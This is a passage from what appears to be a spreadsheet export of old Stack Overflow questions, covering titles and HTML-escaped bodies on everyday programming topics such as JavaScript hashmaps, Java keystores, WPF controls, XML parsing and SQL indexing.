&lt;p&gt;and I want to be sure that any key I access is going to be a number:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;aa['hey'] = 4.3;
aa['btar'] = 43.1;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know JS doesn't have typing, so I can't automatically check this, but I can ensure in my own code that I only assign strings to this aa. &lt;/p&gt;
&lt;p&gt;Now I'm taking keys from the user. I want to display the value for that key. However, if the user gives me something like "toString", he'll get back a function, not an int! Is there any way to make sure any string he gives me is only something I define? Is the only solution something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;delete aa['toString'];
delete aa['hasOwnProperty'];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;etc...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Java: How to handshake a secured connection using Keystore and Truststore certificate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have 2 terminals A and B. T-A is connect T-B over secured socket connection. I need to write code to implement a connection between the 2 terminals.&lt;/p&gt;
&lt;p&gt;How do I do handshake such connection using Keystore and Truststore. Another word, where do I place keystore/truststore certificate file? (T-A or T-B)&lt;/p&gt;
&lt;p&gt;Any good advice or good example is greatly appreciated.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How much input validation should I be doing on my python functions/methods?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm interested in how much up front validation people do in the Python they write.&lt;/p&gt;
&lt;p&gt;Here are a few examples of simple functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def factorial(num):
    """Computes the factorial of num."""
def isPalindrome(inputStr):
    """Tests to see if inputStr is the same backwards and forwards."""
def sum(nums):
    """Same as the built-in sum()... computes the sum of all the numbers passed in."""
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How thoroughly do you check the input values before beginning computation, and how do you do your checking? Do you throw some kind of proprietary exception if input is faulty (BadInputException defined in the same module, for example)? Do you just start your calculation and figure it will throw an exception at some point if bad data was passed in ("asd" to factorial, for example)?&lt;/p&gt;
&lt;p&gt;When the passed in value is supposed to be a container do you check not only the container but all the values inside it?&lt;/p&gt;
&lt;p&gt;What about situations like factorial, where what's passed in might be convertible to an int (e.g. a float) but you might lose precision when doing so?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Gantt Chart Controls on Windows Forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are evaluating options for a Gantt chart control (on Windows Forms) as opposed developing one on our own. What are the various Gantt Chart controls you have had experience with? Pros and cons?&lt;/p&gt;
&lt;p&gt;Is it a viable idea to develop such a control from scratch (given that the control is not the primary product in this case)?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; Just bringing this up again since I've got only one answer. I'd be very grateful for more inputs. (Hope this is legal.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between User Control and Custom Control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the differences between User Control and Custom Control in ASP.NET&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to change XML Attribute</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I change an attribute of an element in an XML file, using C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Securing certain parts of an application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If someone logs on to my application this user contains a dictionary with certain permissions.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ex: module.view.workspace = true
    module.view.reporting = false
    ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then we know to what parts of the application the user has access.
What I want to know is how we can apply these permissions on the view.
We are working in an AS 3 (FLEX) environment.&lt;/p&gt;
&lt;p&gt;This is what we came up with so far (but I wanna have an idea of other possibilities).
We have a modelLocator storing the loggedOnUser (which contains it's permissions).
these permissions are added to a permissionObject in the modellocator.
We Create a SecurityManager class that has a function called hasAccess("permission").
This object will check the PermissionObject in the modellocator and return true/false.
In the view we just check if the user has access and then show the control.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;If (SecurityManager.hasAccess("module.view.workspace") {
     // code that generates the workspace;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I just don't know if this is the best practice.
Please help me out here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java GUI Creating Components</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope it is correct term-wise to say that components in a GUI is like JButton, JPanel, JTextField, all that good stuff.&lt;/p&gt;
&lt;p&gt;I want to create a text field that takes in an integer. Then a submit button can be pressed and based on the integer that was inputted, create that many textfields in a popup window or whatever.&lt;/p&gt;
&lt;p&gt;I have no clue, could someone get me started in the right direction?&lt;/p&gt;
&lt;p&gt;The trouble I'm having is that I have no clue how to create a for loop to create the GUI components. I mean if I have a for loop and do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print("JTextField num1 = new JTextField()");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then in a for loop it will only create 1 text field when I want many. How do I generically create variables of JTextFields?&lt;/p&gt;
&lt;p&gt;Thanks for your help...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSSQLServer 2008 in virtual pc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are your experiences with running SQL server in a virtual pc?
Currently we have an sql2008 instance running in a virtual machine.
Both CPU's hit the roof the moment a query is executed.&lt;/p&gt;
&lt;p&gt;what are your experiences and what do you suggest in this matter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF - How do i insert my proxy credentials in WebBrowser Control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a &lt;code&gt;webbrowser&lt;/code&gt; &lt;code&gt;control&lt;/code&gt; in WPF to show a virtual earth map, but because  I'm developing behind a &lt;code&gt;proxy&lt;/code&gt; of my company, every time I try to see the map, I have to insert my credentials. &lt;/p&gt;
&lt;p&gt;I would like to insert them automatically in the c# code, how can I achieve that?&lt;/p&gt;
&lt;p&gt;I already try in the navigating event of the web browser using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void webBrowser_Navigating(object sender, NavigatingCancelEventArgs e)
{
    //NetworkCredential credential = new NetworkCredential("u007239", "****", "****");
    //e.WebRequest.Proxy.Credentials = credential;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this doesn't work because I'm getting that &lt;code&gt;e.webrequest&lt;/code&gt; is a &lt;code&gt;null object&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;all the help is welcome. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>mysql range index</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have very simple select like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM table 
  WHERE column1 IN (5, 20, 30);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;on column1 is seted index, after explaining query is index used, all looks to be ok. &lt;/p&gt;
&lt;p&gt;but if there are more than three values in range, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  SELECT * FROM table 
      WHERE column1 IN (5, 20, 30, 40);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;index is not used and select runs thru all records. Am I doing something wrong? thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I embed a win32 DLL in a .NET assembly, and make calls into it using P/Invoke?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a C# wrapper for a third-party native library, which we have as a DLL.  I would like to be able to distribute a single DLL for the new assembly.  Is it possible for me to embed the win32 DLL in my .NET DLL, and still make calls into it using P/Invoke?  If so, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Loop through PivotItems: runtime error 91</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a dataset in a worksheet that can be different every time. I am creating a pivottable from that data, but it is possible that one of the PivotItems is not there. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.PivotItems("Administratie").Visible = False
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If that specific value is not in my dataset, the VBA script fails, saying that it can't define the item in the specified Field. (error 1004)&lt;/p&gt;
&lt;p&gt;So I thought a loop might work. 
I have the following: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim pvtField As PivotField
Dim pvtItem As PivotItem
Dim pvtItems As PivotItems
For Each pvtItem In pvtField.pvtItems
        pvtItem.Visible = False
Next
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that gives me an 91 error at the For Each pvtItem line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object variable or With block variable not set
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thought I declared the variables well enough, but I am most likely missing something obvious... &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding an XmlNode by attribute in ASP.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write some code to find a specific XmlNode object based on the URL in the XML sitemap but can't get it to find anything.&lt;/p&gt;
&lt;p&gt;The sitemap is the standard ASP.net sitemap and contains:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;siteMapNode url="~/lev/index.aspx" title="Live-Eye-Views"&amp;gt;
--- Child Items ---
&amp;lt;/siteMapNode&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The code I'm using to search for the element is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlDocument siteMapXml = new XmlDocument();
siteMapXml.Load(AppDomain.CurrentDomain.BaseDirectory + _siteMapFileName)
XmlNode levRoot = siteMapXml.SelectSingleNode("siteMapNode[@url=\"~/lev/index.aspx\"]");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The levRoot object is always null. When I break after the Load method, I can see all the elements in the XML file so it's loading as expected.&lt;/p&gt;
&lt;p&gt;I've tried using single quotes in the XPath query but that didn't make any difference.&lt;/p&gt;
&lt;p&gt;_siteMapFileName is set in the Initialize method and is pointing at the correct file. &lt;/p&gt;
&lt;p&gt;Does anyone have any ideas what could be up with this or suggest another way to find a specific element by attribute?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to prevent Reflector from being able to reflect my source code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way (reliable and preferably not commercial) to prevent from Reflector to reflect my source code???&lt;/p&gt;
&lt;p&gt;Thanks,
Adi&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disabling text selection in DocumentViewer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question. How do you disable the text selection of DocumentViewer in WPF? This is the feature where an XPS document is displayed by the viewer and then text can be highlighted via mouse. The highlighted text can also be copied but I have already disabled this. I just don't know how to disable the highlighting.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>what does it mean when a bug doesn't crash the program</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sometimes Eclipse comes up saying "hey you should debug this line!!!" but doesn't actually close the program. I can then continue to play big two, and even go through the same events that caused the error the first time and get another error box to pop up!&lt;/p&gt;
&lt;p&gt;The bug is simple, I'll fix it, I just want to know why some bugs are terminal and some are not? What's the difference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScript Hashmap Equivalent</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As made clear in update 3 on &lt;a href="http://stackoverflow.com/questions/367440/javascript-associative-array-without-tostring-etc#367454"&gt;this answer&lt;/a&gt;, this notation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var hash = {};
hash[X]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;does not actually hash the object &lt;code&gt;X&lt;/code&gt;; it actually just converts &lt;code&gt;X&lt;/code&gt; to a string (via &lt;code&gt;.toString()&lt;/code&gt; if it's an object, or some other built-in conversions for various primitive types) and then looks that string up, without hashing it, in "&lt;code&gt;hash&lt;/code&gt;". Object equality is also not checked - if two different objects have the same string conversion, they will just overwrite each other.&lt;/p&gt;
&lt;p&gt;Given this - are there any efficient implementations of hashmaps in javascript? (For example, the 2nd Google result of &lt;a href="http://www.google.com/search?rlz=1C1GGLS_en-USUS299US303&amp;amp;sourceid=chrome&amp;amp;ie=UTF-8&amp;amp;q=javascript+hashmap"&gt;&lt;code&gt;javascript hashmap&lt;/code&gt;&lt;/a&gt; yields an implementation which is O(n) for any operation. Various other results ignore the fact that different objects with equivalent string representations overwrite each other.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does com.mysql.jdbc.Driver take forever to open in MATLAB?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having an issue with com.mysql.jdbc.Driver in MATLAB and I'm hoping someone else has run into it and can help me out.  Basically, my problem is that on one machine, every time I call &lt;code&gt;database('mysql.jdbc.Driver', ...)&lt;/code&gt;, that call takes approximately 30 seconds.  I would just chalk this up as normal except that when I run the same script on a different machine, it the call to &lt;code&gt;database&lt;/code&gt; takes about 15 seconds the first time, and less than 1 second every time after.  Once I have the database connection, running queries takes the same amount of time no matter what machine I'm working on.&lt;/p&gt;
&lt;p&gt;Has anyone else run into (and solved) this issue?  My best guess is that there's some sort of environment issue causing the problem, but I have no idea even where to begin looking.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Associate arbitrary data with ejb call context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a bunch of stateless ejb 3.0 beans calling each other in chain. 
Consider, BeanA.do(message) -&gt; BeanB.do() -&gt; BeanC.do() -&gt; BeanD.do(). 
Now i'd like to access message data from BeanD.do(). Obvious solution is to pass message as a parameter to all that do() calls (actually that's how it works now), but i want some nicer solution.&lt;/p&gt;
&lt;p&gt;Is there some kind of call context? And can i associate arbitrary data with it?&lt;/p&gt;
&lt;p&gt;What i'd like to do, is simply put message in BeanA.do(message) to some local storage associated with bean function call and retrieve it in BeanD.do().&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get this request structure via .asmx web service?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on creating a .asmx webservice to meet the specific needs of an integration environment and for the life of me I cannot figure out how to get one section of it to work.  The key is that the request WSDL needs to be something like the following.  (Note I removed the soap envelope and namespace information)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;methodOne&amp;gt;
    &amp;lt;myValue&amp;gt;string&amp;lt;/myValue&amp;gt;
    &amp;lt;myDemoGroup&amp;gt;
        &amp;lt;myDemoGroupItem&amp;gt;string&amp;lt;/myDemoGroupItem&amp;gt;
        &amp;lt;myDemoGroupItem2&amp;gt;string&amp;lt;/myDemoGroupItem2&amp;gt;
    &amp;lt;/myDemoGroup&amp;gt;
    &amp;lt;myComplexGroup&amp;gt;
        &amp;lt;mySubStructure&amp;gt;
            &amp;lt;subItem1&amp;gt;string&amp;lt;/subItem1&amp;gt;
            &amp;lt;subItem2&amp;gt;string&amp;lt;/subItem2&amp;gt;
        &amp;lt;/mySubStructure&amp;gt;
    &amp;lt;/myComplexGroup
&amp;lt;/methodOne&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, I know how to take care of most of this, the method one tag is handled by the name of my parameter, and then the items inside are simply elements in the class.  SO something like this gets everything except for "MyComplexGroup"&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Web Method]
public void MyWebMethod(MyWebMethodRequest methodOne)
{
    //Do my stuff
}
public class MyWebMethodRequest
{
    public string myValue {get; set;}
    public MyDemoGroupInfo myDemoGroup {get; set;}
}
public class MyDemoGroupInfo
{
    public string myDemoGroupItem {get; set;}
    public string myDemoGroupItem2 {get; set;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The question is how to I define the "myComplexGroup" to allow the creation of multiple mySubStructure elements, while still outputting all items to the WSDL.&lt;/p&gt;
&lt;p&gt;If I continue on and do something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyComplexGroupInfo 
{
    public List&amp;lt;MySubStructureInfo&amp;gt; mySubStructure {get; set;}
}
public class MySubStructureInfo
{
    public string subItem1 {get; set;}
    public string subItem2 {get; set;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can then add &lt;code&gt;public MyComplexGroupInfo myComplexGroup {get; set;}&lt;/code&gt; to the object and I will get part of it, but instead of listing subItem1 and subItem2 it simply says MySubStructureInfo with nil set to one.&lt;/p&gt;
&lt;p&gt;How can I get around this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool to show processes writing to the hard drive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a tool that will show me what applications are writing to the hard drive in real time? I'm thinking something like Task Manager but for I/O. I've got a number of background processes running, and can never tell when Visual Studio is holding everything up, or some other process is hogging the disk (especially when the processor is running at less than 20%).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Removing scrollbars from Content Editor/Page Viewer Webpart</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to display an HTML page inside another SharePoint webpart page.&lt;/p&gt;
&lt;p&gt;I used the Out-of-the-box page viewer webpart, but the page viewer webpart displays a disabled scrollbar inside it.&lt;/p&gt;
&lt;p&gt;I also tried using a content editor webpart with an IFRAME tag in it, but still it didnt't work.&lt;/p&gt;
&lt;p&gt;This is the code i used in the content editor webpart. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;iframe name="Iframe" src="URL1" scrolling="no"
    FRAMEBORDER="0" style="width:100%; border:0;  height:100%; overflow:hidden;"&amp;gt;
&amp;lt;/iframe&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I log *all* ColdFusion scripts and CFCs used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to determine from a large code base, what files are actually being used over a period of time. I need to know about CFM pages and CFCs as well as any included CFM files etc. &lt;/p&gt;
&lt;p&gt;I know I can get &lt;em&gt;some&lt;/em&gt; of this info using logging in application.cfm, or by using IIS, but I will still be missing any include files and any CFCs used. &lt;/p&gt;
&lt;p&gt;Is there any way to get CF to log every file it executes? Ideally I would like to keep any new coding to a minimum or just in one place. &lt;/p&gt;
&lt;p&gt;Thanks,
CiarÃ¡n &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What .NET functions should be better supported in Mono?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to implement a Visual Studio Addin to support cross-platform development. The addon currently only warns developer when using unsupported functions but I also want to implement a feature that informs him about functions that are implemented but produce sideffects / are unstable etc. &lt;/p&gt;
&lt;p&gt;Can anyone help me? I would really appreciate this!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Search engines and browser accept-language</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a web portal where language content will generally depend on the "accept-language" sent by the browser. The same content-URI will thus serve different content to different users depending on their browser setting.&lt;/p&gt;
&lt;p&gt;I'm very curious to know how this will affect search indexing. Does Google index using all languages, and is it handled well?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Some (anti-)patterns on using assert (Java, and others)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Finally, I have a question to ask on Stack Overflow! :-)&lt;/p&gt;
&lt;p&gt;The main target is for Java but I believe it is mostly language agnostic: if you don't have native assert, you can always simulate it.&lt;/p&gt;
&lt;p&gt;I work for a company selling a suite of softwares written in Java. The code is old, dating back to Java 1.3 at least, and at some places, it shows... That's a large code base, some 2 millions of lines, so we can't refactor it all at once.&lt;br /&gt;
Recently, we switched the latest versions from Java 1.4 syntax and JVM to Java 1.6, making conservative use of some new features like &lt;code&gt;assert&lt;/code&gt; (we used to use a DEBUG.ASSERT macro -- I know &lt;code&gt;assert&lt;/code&gt; has been introduced in 1.4 but we didn't used it before), generics (only typed collections), foreach loop, enums, etc.&lt;/p&gt;
&lt;p&gt;I am still a bit green about the use of assert, although I have read a couple of articles on the topic. Yet, some usages I see leave me perplex, hurting my common sense... ^_^ So I thought I should ask some questions, to see if I am right to want to correct stuff, or if it goes against common practices. I am wordy, so I &lt;strong&gt;bolded&lt;/strong&gt; the questions, for those liking to skim stuff.&lt;/p&gt;
&lt;p&gt;For reference, I have searched &lt;em&gt;assert java&lt;/em&gt; in SO and found some interesting threads, but apparently no exact duplicate.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/271526/how-to-avoid-null-statements-in-java" rel="nofollow" title=" How to avoid â€œ!= nullâ€ statements in java? "&gt; How to avoid â€œ!= nullâ€ statements in java? &lt;/a&gt; and &lt;a href="http://stackoverflow.com/questions/302736/how-much-null-checking-is-enough" rel="nofollow" title="How much null checking is enough?"&gt;How much null checking is enough?&lt;/a&gt; are quite relevant, because lot of asserts we have just check if variable is null. At some places in our code, there are usages of the null object (eg. returning &lt;code&gt;new String[0]&lt;/code&gt;) but not always. We have to live with that, at least for maintenance of legacy code.&lt;/li&gt;
&lt;li&gt;Some good answers also in &lt;a href="http://stackoverflow.com/questions/298909/java-assertions-underused" rel="nofollow" title="Java assertions underused"&gt;Java assertions underused&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Oh, and SO indicates with reason that &lt;a href="http://stackoverflow.com/questions/129120/when-should-i-use-debugassert" rel="nofollow" title="When should I use Debug.Assert()?"&gt;When should I use Debug.Assert()?&lt;/a&gt; question is related too (nice feature to reduce duplicates!).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;First, main issue, which triggered my question today:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SubDocument aSubDoc = documents.GetAt( i );
assert( aSubDoc != null );
if ( aSubDoc.GetType() == GIS_DOC )
{
   continue;
}
assert( aSubDoc.GetDoc() != null );
ContentsInfo ci = (ContentsInfo) aSubDoc.GetDoc();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(&lt;em&gt;Yes, we use MS' C/C++ style/code conventions. And I even like it (coming from same background)! So sue us.&lt;/em&gt;)&lt;br /&gt;
First, the &lt;code&gt;assert()&lt;/code&gt; form comes from conversion of &lt;code&gt;DEBUG.ASSERT()&lt;/code&gt; calls. I dislike the extra parentheses, since assert is a language construct, not (no longer, here) a function call. I dislike also &lt;code&gt;return (foo);&lt;/code&gt; :-)&lt;br /&gt;
Next, the asserts don't test here for invariants, they are rather used as guards against bad values. But as I understand it, they are useless here: the assert will throw an exception, not even documented with a companion string, and only if assertions are enabled. So if we have &lt;code&gt;-ea&lt;/code&gt; option, we just have an assertion thrown instead of the regular NullPointerException one. That doesn't look like a paramount advantage, since we catch unchecked exceptions at highest level anyway.&lt;br /&gt;
&lt;strong&gt;Am I right supposing we can get rid of them and live with that (ie. let Java raise such unckecked exception)?&lt;/strong&gt; (or, of course, test against null value if likely, which is done in other places).&lt;/p&gt;
&lt;p&gt;Side note: should I have to assert in the above snippet, I would do that against ci value, not against the getter: even if most getters are optimized/inlined, we cannot be sure, so we should avoid calling it twice.&lt;/p&gt;
&lt;p&gt;Somebody told, in the last referenced thread, that public methods should use tests against values of parameters (usage of the public API) and private methods should rely on asserts instead. Good advice.&lt;br /&gt;
Now, both kinds of methods must check another source of data: external input. Ie. data coming from user, from a database, from some file or from the network, for example.&lt;br /&gt;
In our code, I see asserts against these values. I always change these to real test, so they act even with assertions disabled: these are not invariants and must be properly handled.&lt;br /&gt;
I see only one possible exception, where input is supposed constant, for example a database table filled with constants used in relations: program would break if this table is changed but corresponding code wasn't updated.&lt;br /&gt;
&lt;strong&gt;Do you see other exceptions?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Another relatively frequent use I see, which seems OK: in the default of a switch, or at the end of a series of  &lt;code&gt;else if&lt;/code&gt; testing all possible values (these cases date back before our use of enums!), there is often an &lt;code&gt;assert false : "Unexpected value for stuff: " + stuff;&lt;/code&gt;&lt;br /&gt;
&lt;strong&gt;Looks legitimate for me (these cases shouldn't happen in production), what do you think?&lt;/strong&gt; (beyond the "no switch, use OO" advices which are irrelevant here).&lt;/p&gt;
&lt;p&gt;And finally, &lt;strong&gt;are there any other useful use cases or annoying gotchas&lt;/strong&gt; I missed here? (probably!)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Graph Filtering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a graph in WPF, in each section there are thousands of points to draw. The performance for rendering this graph is horrible. &lt;/p&gt;
&lt;p&gt;Does anyone have any experience with a filter that will represent the graph with much fewer points - similar to the way a stock graph draws itself when its zoomed out. &lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to quickly determine whether a user account is a member of an AD group?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have some code that pulls down a list of users in a group and then iterates through that group to determine if a given account exists, but it seems like there ought to be a more concise (and perhaps faster) way to accomplish this.&lt;/p&gt;
&lt;p&gt;This code (VB.NET) attempts to use the member property of the group object, but it is returning false even when the user is a member of that group. Can anyone see what I am doing wrong here?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim group As DirectoryEntry =  GetNetworkObject(GroupDomanName, NetworkObjectType.NetworkGroup, GroupName)
Dim user As DirectoryEntry =GetNetworkObject(UserDomainName, NetworkObjectType.NetworkUser, Login)
Return group.Properties("member").Contains(user.Path)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;FYI: The GetNetworkObject calls just return a directoryEntry object, I have confirmed that the correct object is being returned for both the group and user object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When to separate certain entities into different repositories?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I generally try and keep all related entities in the same repository. The following are entities that have a relationship between the two (marked with indentation):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User
&lt;ul&gt;
&lt;li&gt;UserPreference&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So they make sense to go into a user repository. However users are often linked to many different entities, what would you do in the following example?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;User&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;UserPrefence&lt;/li&gt;
&lt;li&gt;Order&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Order&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Product&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Order has a relationship with both product and user but you wouldn't put functionality for all 4 entities in the same repository. What do you do when you are dealing with the user entities and gathering order information? You may need extra information about the product and often ORMs will offer the ability of lazy loading. However if your product entity is in a separate repository to the user entity then surely this would cause a conflict between repositories?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing a Python array to a C++ vector using Swig</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an array of objects in Python &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[obj1, obj2, obj3]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I want to pass them to off to a C++ function to perform some computation. I'm using SWIG to write my interface. The class type of the passed object is already defined in C++. &lt;/p&gt;
&lt;p&gt;What's the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reading an Oracle Lite ODB file without Oracle Lite</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to extract the data from an Oracle Lite ODB file without installing Oracle Lite?  Is there a reader out there which will let me browse and copy the data?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Monitoring load on ASP.NET Application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for ways to keep track of simultaneous users within an application.  I cannot use IIS logs due to a load balancer that abstracts the users IP address.  I am looking for a .NET code based solution or a configuration item, possibly with health monitoring to be able to track the "true" simultaneous user count.&lt;/p&gt;
&lt;p&gt;I know that I can monitor the number of sessions, but that isn't really an ideal method to show, as it can be bloated based on the number of sessions with users abandoning their session.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iFrame causes scriptaculous dragging issues in IE7 (full code included)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I drag a link that is inside a draggable div over an iframe in IE7, I get very strange results.  Try the code below and let me know if you have any suggestions about how to fix this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;!--&amp;lt;script type="text/javascript" src="/js/prototype.js"&amp;gt;&amp;lt;/script&amp;gt;--&amp;gt;
    &amp;lt;script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js"&amp;gt;&amp;lt;/script&amp;gt;
    &amp;lt;script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/scriptaculous.js?load=effects,dragdrop,controls"&amp;gt;&amp;lt;/script&amp;gt;
    &amp;lt;!--&amp;lt;script type="text/javascript" src="/js/scriptaculous.js?load=effects,dragdrop,controls"&amp;gt;&amp;lt;/script&amp;gt;--&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;div id="test" style="background-color: #aaaaaa; width: 200px; height: 50px;"&amp;gt;
    	&amp;lt;a href="blah" onclick="blah(); return false;"&amp;gt;blah&amp;lt;/a&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;iframe&amp;gt;	
    &amp;lt;/iframe&amp;gt;
&amp;lt;/body&amp;gt;
